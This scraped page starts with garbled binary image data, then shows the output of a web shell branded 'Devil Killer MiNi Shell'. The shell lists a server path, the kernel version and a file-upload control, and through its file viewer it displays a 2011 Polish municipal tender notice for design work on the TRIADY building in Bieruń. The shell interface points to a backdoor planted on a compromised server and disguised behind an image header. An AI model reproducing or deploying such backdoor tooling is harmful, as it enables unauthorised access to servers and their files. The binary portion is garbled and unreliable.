JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110316/86545-N-2011.html

<p class="kh_header"><b>Bieruń: Modernizacja budynku TRIADY -  dokumentacja projektowa</b><br>
<b>Numer ogłoszenia: 86545 - 2011; data zamieszczenia: 16.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja budynku TRIADY -  dokumentacja projektowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowej wielobranżowej dokumentacji projektowo- kosztorysowej modernizacji budynku TRIADY w Bieruniu przy ul. Jagiełły 1.
Istniejący budynek posiada następujące parametry techniczne:
- kubatura                         -  7587 m3
- powierzchnia zabudowy - 1252,43 m2
- powierzchnia użytkowa  - 1597,47 m2
Obiekt  składa się z trzech połączonych ze sobą segmentów A, B i C.
Segment A jest parterowy z poddaszem nieużytkowym, segment B jest piętrowy z poddaszem nieużytkowym, segment C jest piętrowy z poddaszem nieużytkowym.
Konieczność modernizacji obiektu wynika ze zmiany sposobu użytkowania niektórych pomieszczeń
oraz w związku z potrzebą przeprowadzenia niezbędnych robót remontowych wewnątrz i na zewnątrz budynku. 
Po modernizacji w budynku znajdą swoją siedzibę Bieruński Ośrodek Kultury oraz Miejski Ośrodek Pomocy Społecznej i  Sztab Zarządzania Kryzysowego oraz obecni użytkownicy tj. Straż Miejska i biblioteka.
Roboty remontowe polegać będą miedzy innymi na:
- wyburzeniu niektórych ścianek działowych,
- postawieniu nowych ścianek działowych,
- wykuciu nowych otworów drzwiowych,
- naprawie tynków, podkładów pod posadzki,
- wymianie posadzek,
- wykonaniu gładzi gipsowych,
- wymianie okien w całym obiekcie,
- malowaniu ścian i sufitów,
- remoncie węzłów sanitarnych,
- dostosowanie instalacji elektrycznej i oświetleniowej do potrzeb nowych użytkowników,
- wykonaniu instalacji zasilania awaryjnego dla pomieszczeń Straży Miejskiej i Sztabu Zarządzania  
  Kryzysowego wraz z doborem agregatu prądotwórczego,
- przeróbce instalacji c.o.,
- wykonaniu instalacji komputerowej,
- wykonaniu instalacji wentylacji i klimatyzacji,
- naprawie zniszczonych elementów elewacji, pokrycia dachowego, rynien i rur spustowych, obróbek 
  blacharskich,
- wykonaniu robót związanych z zagospodarowaniem terenu ( opaski wokół budynku, wymianie 
  zniszczonych krawężników drogowych, obrzeży i nawierzchni drogowej, remoncie pochylni itp.)
oraz innych robót budowlanych koniecznych dla uzyskania pozwolenia na użytkowanie w/w budynku.
Wymagany zakres opracowania:
  1) uzyskanie aktualnych podkładów mapowych do celów projektowych, obejmujących swoim zasięgiem 
      teren niezbędny do wykonania projektu,
 2) uzyskanie wypisów i wyrysów z rejestru ewidencji gruntów,
 3) wykonanie inwentaryzacji budowlanej istniejącego obiektu w zakresie niezbędnym do wykonania 
      dokumentacji technicznej,
  4) wykonanie wielobranżowej oceny stanu technicznego istniejącego obiektu w zakresie potrzebnym do 
      wykonania dokumentacji technicznej,
  5) wykonanie wielobranżowej dokumentacji projektowej budowlano-wykonawczej, tj  projekty:
    -  architektoniczno - konstrukcyjny,
    -  instalacji wod-kan, co, wentylacji, klimatyzacji,
    -  elektrycznej, komputerowej, 
    -  aranżacji wnętrz - stosownie do potrzeb użytkownika, 
    - zagospodarowania terenu,
  6) opracowanie specyfikacji technicznych wykonania i odbioru robót,
  7) podanie informacji dotyczących bezpieczeństwa i ochrony zdrowia,
  8) wykonanie przedmiarów robót,
  9) wykonanie kosztorysów inwestorskich,
10) uzyskanie wszelkich wymaganych prawem opinii, zgód, zatwierdzeń, decyzji, pozwoleń, informacji, 
      sprawdzeń, zgłoszeń, uzgodnień rzeczoznawców niezbędnych do realizacji zadania,
11) uzyskanie decyzji o pozwoleniu na budowę, w formie decyzji ostatecznej.

2. Przepisy
Dokumentacja projektowo- kosztorysowa musi być opracowana zgodnie z:
- Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U.113.2010.759                              z późniejszymi zmianami ), a w szczególności art.29 ust.3  Przedmiotu zamówienia nie wolno opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i nie można opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu  towarzyszą wyrazy  lub   
    równoważny  
    oraz aktami wykonawczymi do tej ustawy
-   Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego 
    zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót 
    budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 202.2004.2072  z późn. zm.),
-   Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod 
     i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac      
    projektowych oraz planowanych określonych w programie funkcjonalno-użytkowym 
(Dz. U. 130. 2004.1389),
-   Ustawą z dnia 7 lipca 1994 r. Prawo budowlane ( tekst jednolity Dz.U. 243.2010.1623 ) 
    oraz zgodnie z aktami wykonawczymi do tej Ustawy, a w szczególności:
-   Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji 
    dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia 
    (Dz. U. 120. 2003.1126),
-   Ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz.U. 92.2004.881)
    oraz aktami wykonawczymi do tej ustawy,
-   Rozporządzeniem MSW i A z 05.98.1998 r. w sprawie aprobat i kryteriów technicznych oraz 
    jednostkowego stosowania wyrobów budowlanych (Dz.U. 107.1998.679 z późn. zm.),    
-   Ustawa z dnia 27.03.2003 r. O planowaniu i zagospodarowaniu przestrzennym 
    ( Dz.U. 80.2003.717 z poźn. zmianami),
oraz innymi obowiązującymi przepisami prawa (w tym: ochrony ppoż., bhp, ochrony środowiska), przepisami techniczno-budowlanymi , normami, katalogami, wytycznymi, instrukcjami.

3. Szczegółowe warunki wykonania dokumentacji projektowo- kosztorysowej:
1)  Dokumentację należy wykonać w wersji papierowej i elektronicznej. Wersję papierową należy 
     wykonać w 7 egzemplarzach, za wyjątkiem kosztorysu inwestorskiego, który należy wykonać                     
     w 2  egz. Wersję elektroniczna należy wykonać w 2 kpl, z tym że kosztorys inwestorski należy 
     dostarczyć na  oddzielnym nośniku w wersji umożliwiającej przetwarzanie..
2)   Przyjęte w trakcie projektowania rozwiązania, materiały należy konsultować z zamawiającym .
3)   Projektant zobowiązany jest do opisywania proponowanych materiałów i urządzeń za pomocą 
      parametrów technicznych, tzn. bez podawania ich nazw, znaków wskazujących na producenta.
4)   Zaleca się dokonanie wizji lokalnej obiektu  przed złożeniem oferty.
5)   Zamawiający nie przewiduje: zamówień uzupełniających, aukcji elektronicznej , zawarcia umowy 
      ramowej w rozumieniu ustawy pzp  oraz zaliczek na poczet wykonania umowy.
6)   Zamawiający nie dopuszcza składania ofert częściowych wariantowych.
7)   Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący załącznik 
  do SIWZ. 


8)   Do obowiązków wykonawcy, w ramach wykonania przedmiotu zamówienia, będzie też należał 
      udział w procedurze wyboru wykonawcy robót budowlanych w zakresie udzielania odpowiedzi na 
      zapytania dot. rozwiązań zawartych w dokumentacji projektowej.
9)   Projekt musi dostosować obiekt do aktualnych potrzeb użytkownika oraz być zgodny 
      z obowiązującymi przepisami prawa.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.24.20.00-6, 71.24.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli                                                                                   przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę :
- oświadczenia (zgodnie z art. 22 ust.1 pkt 1ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie:
 Wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert,                             
 a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, nie mniej niż dwie  
 dokumentacje  techniczne budowy ,przebudowy, modernizacji lub remontu obiektu budowlanego        
 kubaturowego o kubaturze min.3000 m3 każdy.
 Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie  
 przedłożonych w ofercie: 
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp ) ,
-   dokumentu : wykazu wykonanych usług w zakresie opracowania wymaganych dokumentacji 
   technicznych , z podaniem przedmiotu, dat wykonania i odbiorców oraz załączeniem  
   dokumentów (np. referencji) potwierdzających, że usługi te zostały wykonane należycie. 
Przy ocenie spełnienia warunku za wykonane, zamawiający uzna te opracowania ,które zostały wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena oferty nastąpi łącznie tzn. należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców                                                                                                                                                                                                                                                                                                                                                                                                                        w całości lub wykonawcy spełniają go łącznie, poprzez wykazanie się realizacją po jednym  z ww. projektów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez wykonawcę oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp ).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia tj.dysponują:
 a) osobą, która posiada uprawnienia budowlane do projektowania bez ograniczeń   w specjalności 
     architektonicznej, a w przedmiotowym zamówieniu będzie uczestniczyć  w wykonaniu 
     zamówienia ,
b) osobą, która posiada uprawnienia budowlane do projektowania bez ograniczeń w specjalności 
     instalacji wewnętrznych wod-kan ,co i gaz, a w przedmiotowym zamówieniu będzie    
     uczestniczyć w wykonaniu zamówienia,
c) osobą, która posiada uprawnienia budowlane do projektowania bez ograniczeń w specjalności 
     instalacji wewnętrznych elektrycznych, a w przedmiotowym zamówieniu będzie uczestniczyć  
     w wykonaniu zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez wykonawcę :
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp ) ,
-	dokumentu : wykazu osób, które będą  uczestniczyć w wykonywaniu zamówienia wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości , wraz                      z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia,              a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców w całości lub wykonawcy spełniają go łącznie, poprzez wykazanie dysponowania osobami z w/w uprawnieniami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia :         
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie       przedłożonego przez wykonawcę :
- 	oświadczenia (zgodnie z art. 22 ust.1 pkt 4 ustawy pzp ).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Każdy wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1) 	Oferta jest jawna w całości / części. Strony oferty od ....     do .....    stanowią tajemnicę       przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą być ujawnione innym uczestnikom postępowania.
W przypadku braku złożenia oświadczenia lub braku wypełnienia formularza ofertowego w tym zakresie, zamawiający uzna, że oferta wykonawcy jest jawna w całości.
2) 	Oświadczenie, czy część zamówienia zostanie powierzona podwykonawcom. W przypadku
    	braku złożenia oświadczenia lub braku wypełnienia formularza ofertowego w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia części zamówienia podwykonawcom.  
3)	Oświadczenie podmiotów występujących wspólnie - w przypadku ich udziału w postępowaniu.

4) 	Oświadczenie osoby/ osób podpisujących ofertę, że jest / są uprawniona/-e do zaciągania zobowiązań i składania oświadczeń w imieniu wykonawcy.
5) 	Oświadczenie o zapoznaniu się z treścią SIWZ i jej akceptacji.
6) 	Oświadczenie o  związaniu ofertą  przez okres 30 dni od daty upływu terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z wykonawcą umowy w zakresie:
a.	wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie  z obowiązującą stawką;
b.	zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy                       z zachowaniem wymagań określonych  w SIWZ;, jakie osoby te powinny spełniać;
c.	terminu realizacji i jego poszczególnych etapów, w szczególności spowodowane: 
      absencją chorobową, zmianą przepisów, przedłużającymi się procedurami 
                        i związanymi  z uzyskaniem koniecznych uzgodnień, opinii i pozwoleń;
d.	mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa; 
e.	innych zmian, w przypadku gdy konieczność wprowadzenie zmian będzie następstwem zmian lub wytycznych instytucji, która przekazała środki na sfinansowanie zamówienia ;
f.	innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ,                      a które nie wykraczają poza zakres art. 140 ustawy pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych; 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2011 godzina 12:00, miejsce: Urząd Miejski w Bieruniu - Kancelaria (parter), 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com